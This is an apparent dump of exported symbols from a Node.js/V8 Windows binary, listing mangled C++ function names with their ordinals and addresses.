                                                                                                                                                                                                        ?EnterFinalPause@LocalEmbedderHeapTracer@internal@v8@@QEAAXXZ54230x1409e6070
                                                                                                                                                                                                        ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@@Z54240x1405044b0
                                                                                                                                                                                                        ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@_N@Z54250x140450810
                                                                                                                                                                                                        ?EnterGlobalScope@AsmJsScanner@internal@v8@@QEAAXXZ54260x140637150
                                                                                                                                                                                                        ?EnterLocalScope@AsmJsScanner@internal@v8@@QEAAXXZ54270x140637160
                                                                                                                                                                                                        ?Entries@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$vector@VEntry@TypeProfile@debug@v8@@V?$allocator@VEntry@TypeProfile@debug@v8@@@std@@@std@@XZ54280x140a6ea00
                                                                                                                                                                                                        ?EntryAtIndex@IdentityMapBase@internal@v8@@IEBAPEA_KH@Z54290x1406b4610
                                                                                                                                                                                                        ?EntryForEnumerationIndex@SwissNameDictionary@internal@v8@@QEAAHH@Z54300x140483680
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54310x1407f6990
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54320x1407f6a10
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54330x1407f6ad0
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54340x1407f6b40
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54350x1407f6ba0
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54360x1407f6a10
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54370x1407f6a10
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54380x1407f6ba0
                                                                                                                                                                                                        ?EntryForProbe@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z54390x1407f6c50
                                                                                                                                                                                                        ?EntryFromBuiltinAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@W4Builtin@23@@Z54400x140504520
                                                                                                                                                                                                        ?EntryFromBuiltinIndexAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VRegister@23@@Z54410x140504560
                                                                                                                                                                                                        ?EntrySizeFromMode@HandlerTable@internal@v8@@CAHW4EncodingMode@123@@Z54420x140a9f560
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54430x1407f6d00
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54440x1404836c0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54450x1404836d0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54460x1404836e0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54470x1407f6d10
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54480x1404836f0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54490x1404836c0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54500x1404836c0
                                                                                                                                                                                                        ?EntryToIndex@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54510x1404836f0
                                                                                                                                                                                                        ?EntryToIndex@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHVInternalIndex@23@@Z54520x140475460
                                                                                                                                                                                                        ?EntryToIndex@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHVInternalIndex@23@@Z54530x140483700
                                                                                                                                                                                                        ?EntryToIndex@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHVInternalIndex@23@@Z54540x140483720
                                                                                                                                                                                                        ?EntryToIndexRaw@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHH@Z54550x140475460
                                                                                                                                                                                                        ?EntryToIndexRaw@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHH@Z54560x140483700
                                                                                                                                                                                                        ?EntryToIndexRaw@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHH@Z54570x140483720
                                                                                                                                                                                                        ?EntryToValueIndex@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54580x140483740
                                                                                                                                                                                                        ?EntryToValueIndex@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z54590x140483740
                                                                                                                                                                                                        ?EphemeronHashTablePrint@EphemeronHashTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z54600x140a31030
                                                                                                                                                                                                        ?EphemeronKeyWriteBarrierFromCode@Heap@internal@v8@@SAX_K0PEAVIsolate@23@@Z54610x1409b4ea0
                                                                                                                                                                                                        ?Epilogue@IncrementalMarking@internal@v8@@QEAAXXZ54620x1409a75c0
                                                                                                                                                                                                        ?Equal@Bignum@base@v8@@SA_NAEBV123@0@Z54630x140e6a6b0
                                                                                                                                                                                                        ?Equal@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z54640x140f3bf60
                                                                                                                                                                                                        ?Equals@BitVector@internal@v8@@QEBA_NAEBV123@@Z54650x1404bb950
                                                                                                                                                                                                        ?Equals@FieldType@internal@v8@@QEBA_NV123@@Z54660x140878300
                                                                                                                                                                                                        ?Equals@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z54670x1404bb9a0
                                                                                                                                                                                                        ?Equals@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@0@Z54680x140eac850
                                                                                                                                                                                                        ?Equals@Object@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z54690x1407f6d20
                                                                                                                                                                                                        ?Equals@Operator@compiler@internal@v8@@UEBA_NPEBV1234@@Z54700x1404bb9c0
                                                                                                                                                                                                        ?Equals@Type@compiler@internal@v8@@QEBA_NV1234@@Z54710x1404bb9d0
                                                                                                                                                                                                        ?Equals@Value@v8@@QEBA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z54720x140b110d0
                                                                                                                                                                                                        ?EqualsCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z54730x1404bba20
                                                                                                                                                                                                        ?EqualsForTesting@SwissNameDictionary@internal@v8@@QEAA_NV123@@Z54740x1407c1070
                                                                                                                                                                                                        ?EquivalentTime@DateCache@internal@v8@@QEAA_J_J@Z54750x140705c90
                                                                                                                                                                                                        ?EquivalentYear@DateCache@internal@v8@@QEAAHH@Z54760x140705d30
                                                                                                                                                                                                        ?ErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@HPEBD11@Z54770x14028a730
                                                                                                                                                                                                        ?Error@AsyncStreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@@std@@@std@@AEBVWasmError@234@@Z54780x140571900
                                                                                                                                                                                                        ?Error@AsyncStreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@@std@@@std@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@6@@Z54790x140571960
                                                                                                                                                                                                        ?Error@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Local@VString@v8@@@2@@Z54800x140b11250
                                                                                                                                                                                                        ?ErrorLevel@Message@v8@@QEBAHXZ54810x140b113c0
                                                                                                                                                                                                        ?Error_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ54820x140483750
                                                                                                                                                                                                        ?Error_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ54830x1406cdbf0
                                                                                                                                                                                                        ?Escape@EscapableHandleScope@v8@@AEAAPEA_KPEA_K@Z54840x140b113d0
                                                                                                                                                                                                        ?EstimateLiftoffCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KH@Z54850x14056ac90
                                                                                                                                                                                                        ?EstimateMarkingStepSize@GCIdleTimeHandler@internal@v8@@SA_KNN@Z54860x1409cc6b0
                                                                                                                                                                                                        ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KHHH_N@Z54870x14056aca0
                                                                                                                                                                                                        ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@_N@Z54880x14056ad20
                                                                                                                                                                                                        ?EstimateNativeModuleMetaDataSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@@Z54890x14056adc0
                                                                                                                                                                                                        ?EstimateObjectsCount@V8HeapExplorer@internal@v8@@QEAAHXZ54900x1407537a0
                                                                                                                                                                                                        ?Eternalize@V8@v8@@CAPEAVValue@2@PEAVIsolate@2@PEAV32@@Z54910x140b11490
                                                                                                                                                                                                        ?EvalError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ54920x140483760
                                                                                                                                                                                                        ?EvalError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ54930x1406cdc00
                                                                                                                                                                                                        ?Evaluate@Module@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@@Z54940x140b114f0
                                                                                                                                                                                                        ?EvaluateGlobal@debug@v8@@YA?AV?$MaybeLocal@VValue@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@W4EvaluateGlobalMode@12@_N@Z54950x140a6ebb0
                                                                                                                                                                                                        ?EvaluateGlobalForTesting@debug@v8@@YA?AV?$MaybeLocal@VValue@v8@@@2@PEAVIsolate@2@V?$Local@VScript@v8@@@2@W4EvaluateGlobalMode@12@_N@Z54960x140a6ed50
                                                                                                                                                                                                        ?EventListener@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB54970x141ff9a58
                                                                                                                                                                                                        ?EvictFreeListItems@FreeList@internal@v8@@QEAA_KPEAVPage@23@@Z54980x1409cd0d0
                                                                                                                                                                                                        ?EvictMarkedCode@OSROptimizedCodeCache@internal@v8@@QEAAXPEAVIsolate@23@@Z54990x1407dfba0
                                                                                                                                                                                                        ?Exception@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB55000x141ff9a60
                                                                                                                                                                                                        ?Exception@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ55010x140b118a0
                                                                                                                                                                                                        ?ExceptionHandler@TurboAssembler@internal@v8@@QEAAXXZ55020x140078990
                                                                                                                                                                                                        ?Exec@RegExp@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSRegExp@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HV?$Handle@VRegExpMatchInfo@internal@v8@@@23@W4ExecQuirks@123@@Z55030x1407188d0
                                                                                                                                                                                                        ?Exec@RegExp@v8@@QEAA?AV?$MaybeLocal@VObject@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@@Z55040x140b11950
                                                                                                                                                                                                        ?Execute@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAAXXZ55050x1405bfdc0
                                                                                                                                                                                                        ?Execute@NativeRegExpMacroAssembler@internal@v8@@SAHVString@23@HPEBE1PEAHHPEAVIsolate@23@VJSRegExp@23@@Z55060x140723ab0
                                                                                                                                                                                                        ?ExecuteCompilation@WasmCompilationUnit@wasm@internal@v8@@QEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@PEBVWireBytesStorage@234@PEAVCounters@34@PEAVWasmFeatures@234@@Z55070x1405bff90
                                                                                                                                                                                                        ?ExecuteFunctionCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@PEBVWireBytesStorage@234@PEAVCounters@34@PEAVWasmFeatures@234@@Z55080x1405c0110
                                                                                                                                                                                                        ?ExecuteImportWrapperCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@@Z55090x1405c0630
                                                                                                                                                                                                        ?ExecuteJob@OptimizedCompilationJob@internal@v8@@QEAA?AW4Status@CompilationJob@23@PEAVRuntimeCallStats@23@PEAVLocalIsolate@23@@Z55100x140aa9880
                                                                                                                                                                                                        ?ExecuteLiftoffCompilation@wasm@internal@v8@@YA?AUWasmCompilationResult@123@PEAUCompilationEnv@123@AEBUFunctionBody@123@HW4ForDebugging@123@AEBULiftoffOptions@123@@Z55110x1405fe0c0
                                                                                                                                                                                                        ?ExecutePreFinalizers@HeapBase@internal@cppgc@@IEAAXXZ55120x140465780
                                                                                                                                                                                                        ?Exit@Context@v8@@QEAAXXZ55130x140b11c20
                                                                                                                                                                                                        ?Exit@Isolate@internal@v8@@QEAAXXZ55140x140a10cc0
                                                                                                                                                                                                        ?Exit@Isolate@v8@@QEAAXXZ55150x140b11d10
                                                                                                                                                                                                        ?ExitProcess@OS@base@v8@@SAXH@Z55160x140e5fef0
                                                                                                                                                                                                        ?Expand@CompactionSpace@internal@v8@@MEAAPEAVPage@23@XZ55170x140964900
                                                                                                                                                                                                        ?Expand@PagedSpace@internal@v8@@MEAAPEAVPage@23@XZ55180x140964960
                                                                                                                                                                                                        ?Expand@RegExpBytecodeGenerator@internal@v8@@AEAAXXZ55190x14073d550
                                                                                                                                                                                                        ?ExpandBackground@PagedSpace@internal@v8@@IEAA?AV?$Optional@U?$pair@_K_K@std@@@base@3@PEAVLocalHeap@23@_K@Z55200x140964a60
                                                                                                                                                                                                        ?ExpandInternals@BitsetType@compiler@internal@v8@@SAII@Z55210x140e9fd60
                                                                                                                                                                                                        ?Expect@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z55220x140774db0
                                                                                                                                                                                                        ?ExpectContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@PEBDH@Z55230x140774df0
                                                                                                                                                                                                        ?ExpectSemicolon@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ55240x140774ee0
                                                                                                                                                                                                        ?ExpectedTransitionKey@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ55250x140483770
                                                                                                                                                                                                        ?ExpectedTransitionTarget@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@XZ55260x1404838c0
                                                                                                                                                                                                        ?ExperimentalOneshotExec@RegExp@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSRegExp@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HV?$Handle@VRegExpMatchInfo@internal@v8@@@23@W4ExecQuirks@123@@Z55270x140718a50
                                                                                                                                                                                                        ?Exponentiate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z55280x140f3c460
                                                                                                                                                                                                        ?ExportForOptimization@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVGraph@234@XZ55290x14108cdc0
                                                                                                                                                                                                        ?ExportForTest@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVSchedule@234@XZ55300x14108cfc0
                                                                                                                                                                                                        ?ExportImportedFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@H@Z55310x140540520
                                                                                                                                                                                                        ?ExportNativeModule@WasmEngine@wasm@internal@v8@@QEAA?AV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@@Z55320x1405566d0
                                                                                                                                                                                                        ?ExpressionFromIdentifier@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@HW4InferName@23@@Z55330x140774f90
                                                                                                                                                                                                        ?ExpressionFromLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@W4Value@Token@23@H@Z55340x1407a8690
                                                                                                                                                                                                        ?ExpressionFromPrivateName@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVPrivateNameScopeIterator@23@PEBVAstRawString@23@H@Z55350x140774fe0
                                                                                                                                                                                                        ?ExpressionListToExpression@Parser@internal@v8@@AEAAPEAVExpression@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z55360x1407a8860
                                                                                                                                                                                                        ?Extend@HandleScope@internal@v8@@CAPEA_KPEAVIsolate@23@@Z55370x1409f4750
                                                                                                                                                                                                        ?Extend@ScriptContextTable@internal@v8@@SA?AV?$Handle@VScriptContextTable@internal@v8@@@23@V423@V?$Handle@VContext@internal@v8@@@23@@Z55380x1408bc3a0
                                                                                                                                                                                                        ?ExtendTheAfterSegment@DateCache@internal@v8@@AEAAXHH@Z55390x140a79a90
                                                                                                                                                                                                        ?ExtendingNonExtensible@LookupIterator@internal@v8@@QEAA_NV?$Handle@VJSReceiver@internal@v8@@@23@@Z55400x140483970
                                                                                                                                                                                                        ?Extern@AsmType@wasm@internal@v8@@SAPEAV1234@XZ55410x140632850
                                                                                                                                                                                                        ?ExternalAssemblerBuffer@internal@v8@@YA?AV?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@PEAXH@Z55420x140ab4330
                                                                                                                                                                                                        ?ExternalBackingStoreBytes@NewSpace@internal@v8@@QEAA_KXZ55430x1404839b0
                                                                                                                                                                                                        ?ExternalBackingStoreBytes@NewSpace@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z55440x140483a10
                                                                                                                                                                                                        ?ExternalBackingStoreBytes@Space@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z55450x140483a30
                                                                                                                                                                                                        ?ExternalConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VExternalReference@internal@v8@@@34@VExternalReference@34@@Z55460x140f1fec0
                                                                                                                                                                                                        ?ExternalConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVExternalReference@34@@Z55470x140eb3430
                                                                                                                                                                                                        ?ExternalConstant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z55480x140f5a0a0
                                                                                                                                                                                                        ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z55490x140f55090
                                                                                                                                                                                                        ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@W4FunctionId@Runtime@34@@Z55500x140f550f0
                                                                                                                                                                                                        ?ExternalConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z55510x140f1ff10
                                                                                                                                                                                                        ?ExternalPointer@Type@compiler@internal@v8@@SA?AV1234@XZ55520x1404bbad0
                                                                                                                                                                                                        ?ExternalReferenceAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VExternalReference@23@VRegister@23@@Z55530x1405045d0
                                                                                                                                                                                                        ?Externalize@ArrayBuffer@v8@@QEAA?AVContents@12@XZ55540x140b11d20
                                                                                                                                                                                                        ?Externalize@ArrayBuffer@v8@@QEAAXAEBV?$shared_ptr@VBackingStore@v8@@@std@@@Z55550x140b11d40
                                                                                                                                                                                                        ?Externalize@SharedArrayBuffer@v8@@QEAA?AVContents@12@XZ55560x140b11dd0
                                                                                                                                                                                                        ?Externalize@SharedArrayBuffer@v8@@QEAAXAEBV?$shared_ptr@VBackingStore@v8@@@std@@@Z55570x140b11df0
                                                                                                                                                                                                        ?ExtractAccessorInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorInfo@23@@Z55580x140753820
                                                                                                                                                                                                        ?ExtractAccessorPairProperty@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VName@23@VObject@23@H@Z55590x140753a80
                                                                                                                                                                                                        ?ExtractAccessorPairReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorPair@23@@Z55600x140753b60
                                                                                                                                                                                                        ?ExtractAllocationSiteReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAllocationSite@23@@Z55610x140753cf0
                                                                                                                                                                                                        ?ExtractArrayBoilerplateDescriptionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VArrayBoilerplateDescription@23@@Z55620x140753e20
                                                                                                                                                                                                        ?ExtractCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCell@23@@Z55630x140753e90
                                                                                                                                                                                                        ?ExtractCodeReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCode@23@@Z55640x140753f60
                                                                                                                                                                                                        ?ExtractContextReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VContext@23@@Z55650x140754170
                                                                                                                                                                                                        ?ExtractDescriptorArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VDescriptorArray@23@@Z55660x140754560
                                                                                                                                                                                                        ?ExtractElementReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z55670x140754670
                                                                                                                                                                                                        ?ExtractEphemeronHashTableReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VEphemeronHashTable@23@@Z55680x140754830
                                                                                                                                                                                                        ?ExtractFeedbackCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackCell@23@@Z55690x140754a10
                                                                                                                                                                                                        ?ExtractFeedbackVectorReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackVector@23@@Z55700x140754ab0
                                                                                                                                                                                                        ?ExtractFixedArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFixedArray@23@@Z55710x140754b30
                                                                                                                                                                                                        ?ExtractInternalReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z55720x140754bb0
                                                                                                                                                                                                        ?ExtractJSArrayBufferReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSArrayBuffer@23@@Z55730x140754cc0
                                                                                                                                                                                                        ?ExtractJSCollectionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSCollection@23@@Z55740x140754d80
                                                                                                                                                                                                        ?ExtractJSGeneratorObjectReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSGeneratorObject@23@@Z55750x140754e50
                                                                                                                                                                                                        ?ExtractJSGlobalProxyReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSGlobalProxy@23@@Z55760x140755000
                                                                                                                                                                                                        ?ExtractJSObjectReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSObject@23@@Z55770x1407550d0
                                                                                                                                                                                                        ?ExtractJSPromiseReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSPromise@23@@Z55780x140755680
                                                                                                                                                                                                        ?ExtractJSWeakCollectionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSWeakCollection@23@@Z55790x140754d80
                                                                                                                                                                                                        ?ExtractLocation@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VHeapObject@23@@Z55800x140755750
                                                                                                                                                                                                        ?ExtractLocationForJSFunction@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSFunction@23@@Z55810x1407557f0
                                                                                                                                                                                                        ?ExtractMapReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VMap@23@@Z55820x140755930
                                                                                                                                                                                                        ?ExtractMaps@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@V?$Handle@VMap@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VMap@internal@v8@@@internal@v8@@@std@@@std@@@Z55830x14087ac00
                                                                                                                                                                                                        ?ExtractMapsAndFeedback@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@@Z55840x14087ac90
                                                                                                                                                                                                        ?ExtractMapsAndHandlers@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@V?$function@$$A6A?AV?$MaybeHandle@VMap@internal@v8@@@internal@v8@@V?$Handle@VMap@internal@v8@@@23@@Z@5@@Z55850x14087ad70
                                                                                                                                                                                                        ?ExtractNumberReference@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VObject@23@@Z55860x140755e40
                                                                                                                                                                                                        ?ExtractPropertyCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VPropertyCell@23@@Z55870x140755f00
                                                                                                                                                                                                        ?ExtractPropertyReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z55880x140755ff0
                                                                                                                                                                                                        ?ExtractReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VHeapObject@23@@Z55890x140756490
                                                                                                                                                                                                        ?ExtractScriptReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VScript@23@@Z55900x1407569c0
                                                                                                                                                                                                        ?ExtractSharedFunctionInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VSharedFunctionInfo@23@@Z55910x140756c10
                                                                                                                                                                                                        ?ExtractStringReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VString@23@@Z55920x140756e60
                                                                                                                                                                                                        ?ExtractSymbolReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VSymbol@23@@Z55930x140757000
                                                                                                                                                                                                        ?ExtractWrapperInfo@LocalEmbedderHeapTracer@internal@v8@@QEAA?AU?$pair@PEAXPEAX@std@@PEAVIsolate@23@VJSObject@23@@Z55940x1409e61e0
                                                                                                                                                                                                        ?F32x4Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ55950x140eca7d0
                                                                                                                                                                                                        ?F32x4Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ55960x140eca7e0
                                                                                                                                                                                                        ?F32x4Ceil@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ55970x140eca7f0
                                                                                                                                                                                                        ?F32x4DemoteF64x2Zero@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ55980x140eca800
                                                                                                                                                                                                        ?F32x4Div@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ55990x140eca810
